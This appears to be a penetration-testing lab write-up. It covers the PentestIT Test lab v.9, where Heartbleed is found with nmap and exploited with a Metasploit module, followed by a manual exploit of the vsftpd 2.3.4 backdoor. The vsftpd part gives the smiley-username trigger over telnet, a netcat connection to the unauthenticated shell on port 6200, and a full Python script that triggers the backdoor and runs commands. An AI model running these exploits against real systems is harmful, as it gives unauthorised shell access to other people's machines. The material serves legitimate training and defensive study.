PentestIT Test lab v.9

The “Test lab” penetration testing laboratories emulate the IT infrastructure of real companies and are created for legal pentesting and for improving penetration testing skills. Each laboratory is unique and contains recent, well-known vulnerabilities.

Test lab v.9 emulates CyBear 32C*, a professional software development company engaged in the development of various information security systems and applications, so CyBear 32C* is well protected against hacker attacks. Compromising CyBear 32C*’s corporate network requires good penetration testing skills.

Network diagram

https://lab.pentestit.ru/images/labs/TL9_map.png

To reach the internal network we first have to bypass the gateway at 192.168.101.8.

Nmap scan output

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:37 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.18s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports 80 and 443 were not accessible from a browser, but on port 8100 I could reach the Roundcube webmail application. I tried to enumerate it with “dirb” and found nothing interesting. Ports 80 and 443 appeared to be protected by a WAF: every attempt to open port 80 returned an error message. After adding the DNS name with the IP to /etc/hosts and reloading, the correct page came up, so I ran dirb against port 80 as well, again without anything useful. As a last try I enumerated port 443 and noticed something interesting 😉 the Heartbleed vulnerability.

nmap -sV --script=ssl-heartbleed 192.168.101.8

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-28 06:58 EDT
Nmap scan report for cybear32c.lab (192.168.101.8)
Host is up (0.17s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
25/tcp   open  smtp       Postfix smtpd
80/tcp   open  http       nginx 1.10.0
443/tcp  open  http       nginx 1.8.1
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL 
|   cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/
3128/tcp open  http-proxy Squid http proxy 3.4.8
8100/tcp open  http       nginx
Service Info: Host: -mail.cybear32c.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploited the Heartbleed vulnerability using the Metasploit auxiliary module “auxiliary/scanner/ssl/openssl_heartbleed”.

After dumping memory several times I got an interesting /var/www path in the leaked data. Using that path I navigated to the page and got the BYPASS token.


Manual vsFTPd Vulnerability Exploitation

vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL distributions.

nmap -p0-65535 192.168.2.129


root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011 it was discovered that the vsftpd 2.3.4 source archive downloadable from the master site had been compromised. Users logging into a compromised vsftpd 2.3.4 server could send a user name containing the smiley “:)” and gain a command shell on port 6200. This was not a security hole in vsftpd itself: someone had uploaded a different version of vsftpd that contained a backdoor. Since then, the site has been moved to Google App Engine.

Let’s try to exploit it without Metasploit.

Connect to the vsFTPd server and log in with a USER name and a PASS.

Note: the user name should end with the smiley “:)”, a colon immediately followed by a closing parenthesis; “: )” with a space in between does not trigger the backdoor 🙂

Whenever a user connects to the backdoored vsFTPd with the smiley in the user name, the daemon opens the backdoor and starts listening on port 6200 of the FTP server.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER invalid:)
331 Please specify the password.
PASS dont know
^]
telnet> quit
Connection closed.

Close the telnet session and connect back to port 6200 using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

This connects to the backdoor shell on the vsFTPd server without any authentication.
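The same sequence scripted, as an added Python example that is not part of the original post: it checks the banner, sends the smiley USER and a PASS exactly like the telnet session above, then connects to port 6200 and runs a command. The host 192.168.2.129 is the target from the scan above; the “invalid” user name, the password text and the two-second pause before connecting back are my assumptions. The `has_backdoor_trigger` check mirrors the daemon’s test (the two bytes 0x3a 0x29 adjacent), which is also what to look for in FTP logs when hunting for trigger attempts.

```python
import socket
import sys
import time

TRIGGER = b":)"            # the backdoor looks for the bytes 0x3a 0x29 adjacent anywhere in the USER argument
BACKDOOR_PORT = 6200


def trigger_username(base="invalid"):
    """Any user name works as long as ':)' appears in it with nothing between the two characters."""
    return base.encode() + TRIGGER


def has_backdoor_trigger(user):
    """The same test the trojaned daemon applies; also handy for grepping FTP logs for attempts."""
    return TRIGGER in (user if isinstance(user, bytes) else user.encode())


def is_vsftpd_234(banner):
    """Banner says 2.3.4; whether it is the trojaned build only shows once port 6200 opens."""
    return banner.strip().startswith(b"220 (vsFTPd 2.3.4)")


def read_line(sock):
    data = b""
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        data += chunk
    return data


def trigger_backdoor(host, port=21, user="invalid", password="dont know"):
    """Replay the telnet session: smiley USER, any PASS, then drop the control connection."""
    ftp = socket.create_connection((host, port), timeout=10)
    banner = read_line(ftp)
    if not is_vsftpd_234(banner):
        ftp.close()
        raise RuntimeError("unexpected banner %r" % banner)
    ftp.sendall(b"USER " + trigger_username(user) + b"\r\n")
    ftp.sendall(b"PASS " + password.encode() + b"\r\n")
    time.sleep(2)                       # assumption: a short pause before the listener is up
    ftp.close()


def run_command(host, cmd="id"):
    """Talk to the shell on port 6200: no banner, no authentication, commands in and output out."""
    sh = socket.create_connection((host, BACKDOOR_PORT), timeout=5)
    sh.sendall(cmd.encode() + b"\n")
    out = b""
    try:
        while True:
            chunk = sh.recv(4096)
            if not chunk:
                break
            out += chunk
    except socket.timeout:              # the shell never closes the socket, so we stop on silence
        pass
    sh.close()
    return out.decode(errors="replace")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.2.129"
    trigger_backdoor(target)
    print(run_command(target, "id; uname -a"))
```

Run it with the target as the first argument. The shell on 6200 prints no prompt, so a quiet connection is not a failure: send a command and wait for the output.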


Done 🙂